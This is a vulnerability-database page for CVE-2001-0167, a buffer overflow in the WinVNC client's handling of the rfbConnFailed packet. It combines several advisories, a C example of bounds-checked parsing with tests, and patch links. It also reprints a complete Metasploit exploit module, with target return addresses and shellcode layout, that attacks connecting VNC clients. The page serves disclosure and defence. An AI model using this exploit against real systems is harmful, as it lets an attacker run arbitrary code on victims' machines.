CVE-2001-0167
CVSS 7.6
Published: 2001-05-03 00:00:00
Revised: 2016-10-17 22:10:05

[Original] Buffer overflow in AT&T WinVNC (Virtual Network Computing) client 3.3.3r7 and earlier allows remote attackers to execute arbitrary commands via a long rfbConnFailed packet with a long reason string.


[CNNVD] AT&T WinVNC client buffer overflow vulnerability (CNNVD-200105-044)

CVE(CAN) ID: CAN-2001-0167

VNC is the Virtual Network Computing package. It is a freely available remote administration package designed to access the desktop of a remote system, distributed and maintained by AT&T.

The client part of the package has a problem that allows a remote user to execute arbitrary code. The problem stems from the client's handling of the rfbConnFailed packet that the server sends to the client during connection and authentication. This packet is sent as an error response, normally to tell the client that the connection attempt has failed. The client then passes the contents of the packet through a logging routine for later administrative reference. However, by forging the server version number and, when sending rfbConnFailed, filling in a 1024-byte reason string while setting the reason-string length value to a value greater than 1024, a buffer overflow occurs. This overflow can be used to overwrite stack variables, including the return address, so that arbitrary code can be executed.

This vulnerability allows a malicious user to execute arbitrary code on the remote system with the privileges of the WinVNC client user.

<* Source: Emiliano Kargieman, Agustin Azubel, Maximiliano Caceres *>
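The client-side check that closes the hole described above, shown here as an added example that is neither WinVNC's code nor the Core-SDI patch: a bounded parser for the RFB 3.3 "connection failed" reply, in which the server's security-type word is 0 followed by a big-endian reason length and the reason bytes. The 1024-byte buffer size is taken from the description above but the buffer, struct and function names are assumptions; the packets inside the check functions are constructed test data. The vulnerable pattern is to trust the length field and copy that many bytes into the fixed buffer; the parser below bounds the copy by both the bytes actually received and the buffer size, and treats a length field larger than the data on the wire (such as the 0x406 = 1030 seen in the module further down this page, sent with far fewer bytes) as a protocol error.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Security type 0 in the RFB 3.3 handshake means "connection failed"; the
 * server then sends a big-endian u32 reason length followed by the reason. */
#define RFB_SEC_CONN_FAILED 0u
/* Assumed size of the client's reason buffer (the advisory text describes a
 * 1024-byte buffer; this is a stand-in, not WinVNC's actual declaration). */
#define REASON_BUF_SIZE 1024u

typedef struct {
    uint32_t claimed_len;           /* length field as sent by the server */
    char reason[REASON_BUF_SIZE];   /* NUL-terminated copy, truncated if needed */
    int truncated;                  /* 1 if the reason did not fit */
} rfb_conn_failed;

static uint32_t rd_be32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

/* Parse a "connection failed" reply into *out.
 * Returns 0 on success, -1 if the message is not a failure reply or is
 * malformed (header incomplete, or length field larger than the bytes
 * actually received). The copy never exceeds the destination buffer. */
int parse_rfb_conn_failed(const uint8_t *msg, size_t msg_len, rfb_conn_failed *out)
{
    if (msg_len < 8)
        return -1;                          /* header incomplete */
    if (rd_be32(msg) != RFB_SEC_CONN_FAILED)
        return -1;                          /* not a failure reply */

    uint32_t len = rd_be32(msg + 4);
    if (len > msg_len - 8)
        return -1;          /* server claims more reason bytes than it sent */

    size_t copy = len;
    out->claimed_len = len;
    out->truncated = 0;
    if (copy > REASON_BUF_SIZE - 1) {
        copy = REASON_BUF_SIZE - 1;         /* leave room for the terminator */
        out->truncated = 1;
    }
    memcpy(out->reason, msg + 8, copy);
    out->reason[copy] = '\0';
    return 0;
}

/* Constructed inputs; each check returns 1 on the expected outcome. */
int check_well_formed(void)
{
    static const uint8_t msg[] = { 0, 0, 0, 0, 0, 0, 0, 5, 'N', 'o', 'p', 'e', '!' };
    rfb_conn_failed m;
    return parse_rfb_conn_failed(msg, sizeof msg, &m) == 0
        && strcmp(m.reason, "Nope!") == 0 && m.truncated == 0 && m.claimed_len == 5;
}

int check_inflated_length_rejected(void)
{
    /* Length field 0x00000406 (1030) but only 16 reason bytes on the wire. */
    uint8_t msg[8 + 16] = { 0, 0, 0, 0, 0, 0, 0x04, 0x06 };
    memset(msg + 8, 'A', 16);
    rfb_conn_failed m;
    return parse_rfb_conn_failed(msg, sizeof msg, &m) == -1;
}

int check_long_reason_truncated(void)
{
    /* 2000 reason bytes really present, length field 2000 (0x07d0):
     * well-formed on the wire, but larger than the client buffer. */
    static uint8_t msg[8 + 2000];
    memset(msg, 0, 8);
    msg[6] = 0x07;
    msg[7] = 0xd0;
    memset(msg + 8, 'B', 2000);
    rfb_conn_failed m;
    return parse_rfb_conn_failed(msg, sizeof msg, &m) == 0
        && m.truncated == 1 && strlen(m.reason) == REASON_BUF_SIZE - 1;
}

int main(void)
{
    printf("well-formed reply parsed:      %s\n", check_well_formed() ? "ok" : "FAIL");
    printf("inflated length rejected:      %s\n", check_inflated_length_rejected() ? "ok" : "FAIL");
    printf("over-long reason truncated:    %s\n", check_long_reason_truncated() ? "ok" : "FAIL");
    return 0;
}
```

The design choice worth noting is that an inflated length field is rejected outright rather than used as a hint to keep reading from the socket: a client that loops until it has received the claimed number of bytes is still safe only if its buffer check is correct, while rejecting the reply removes the attacker-controlled quantity from the copy entirely. A reason longer than the buffer is logged truncated with a flag set so that the event is still visible to an administrator.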

- CVSS (base score)

CVSS score: 7.6 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0167
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0167
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200105-044
(Official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=98088315825366&w=2
(UNKNOWN)  BUGTRAQ  20010129 [CORE SDI ADVISORY] WinVNC client buffer overflow
http://www.securityfocus.com/bid/2305
(VENDOR_ADVISORY)  BID  2305
http://xforce.iss.net/static/6025.php
(VENDOR_ADVISORY)  XF  winvnc-client-bo

- Vulnerability information

AT&T WinVNC client buffer overflow vulnerability
High risk  Boundary condition error
2001-05-03 00:00:00 2006-04-07 00:00:00
Remote

- Advisories and patches

Vendor patch:

CNNVD recommends that you download and apply the patch immediately:

ftp://ftp.core-sdi.com/pub/patches/VNC-clientBO.patch
        

- Vulnerability information (16489)

RealVNC 3.3.7 Client Buffer Overflow (EDBID:16489)
windows remote
2010-04-30 Verified
0 metasploit
N/A [Download]
##
# $Id: realvnc_client.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::TcpServer

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'RealVNC 3.3.7 Client Buffer Overflow',
			'Description'    => %q{
				This module exploits a buffer overflow in RealVNC 3.3.7 (vncviewer.exe).
			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9179 $',
			'References'     =>
				[
					[ 'CVE', '2001-0167' ],
					[ 'OSVDB', '6281' ],
					[ 'BID', '2305' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
					'MaxNops'  => 0,
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows 2000 SP4 English',	{ 'Ret' => 0x7c2ec68b } ],
					[ 'Windows XP SP2 English',	{ 'Ret' => 0x77dc15c0 } ],
					[ 'Windows 2003 SP1 English',	{ 'Ret' => 0x76aa679b } ],
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Jan 29 2001',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptPort.new('SRVPORT', [ true, "The VNCServer daemon port to listen on", 5900 ])
			], self.class)
	end

	def on_client_connect(client)

		rfb = "RFB 003.003\n"

		client.put(rfb)
	end

	def on_client_data(client)
		return if ((p = regenerate_payload(client)) == nil)

		filler = make_nops(993 - payload.encoded.length)

		sploit =  "\x00\x00\x00\x00\x00\x00\x04\x06" + filler + payload.encoded
		sploit << [target.ret].pack('V') + make_nops(10) + [0xe8, -457].pack('CV')
		sploit << rand_text_english(200)

		print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...")
		client.put(sploit)

		handler
		service.close_client(client)
	end

end
		

- Vulnerability information (F83177)

RealVNC 3.3.7 Client Buffer Overflow (PacketStormID:F83177)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow
CVE-2001-0167
[Download]

This Metasploit module exploits a buffer overflow in RealVNC 3.3.7 (vncviewer.exe).


- Vulnerability information

6281
AT&T WinVNC Client rfbConnFailed Packet Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public

- Vulnerability description

A buffer overflow exists in WinVNC. The client fails to validate rfbConnFailed packets resulting in a buffer overflow. With a specially crafted packet, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- Timeline

2001-01-29 Unknown
Unknown Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- References

- Vulnerability author

- Vulnerability information

AT&T WinVNC Client Buffer Overflow Vulnerability
Boundary Condition Error 2305
Yes No
2001-01-29 12:00:00 2007-11-02 04:26:00
This vulnerability was discovered by Emiliano Kargieman, Agustin Azubel, and Maximiliano Caceres of Core-SDI, and announced to Bugtraq in a Core-SDI Security Advisory on January 29, 2001.

- Affected program versions

AT&T WinVNC Client 3.3.3 r7
- Microsoft Windows 2000 Professional
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT 4.0
AT&T WinVNC 3.3.3 r9

- Vulnerability discussion

VNC is the Virtual Network Computing package, a freely available remote administration package designed to allow access to a remote system desktop. It is distributed and maintained by AT&T.

A problem with the client portion of the package could allow a remote user to execute arbitrary code. This is due to the handling of the 'rfbConnFailed' packet sent from the server to the client during connection and authentication.

This issue allows an attacker to execute code on a remote system, with the privileges of the user of the WinVNC client.

- Exploit

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

A Metasploit exploit module is available.

- Solution

A patch has been provided by Core-SDI as part of its advisory.


AT&T WinVNC Client 3.3.3 r7

- References
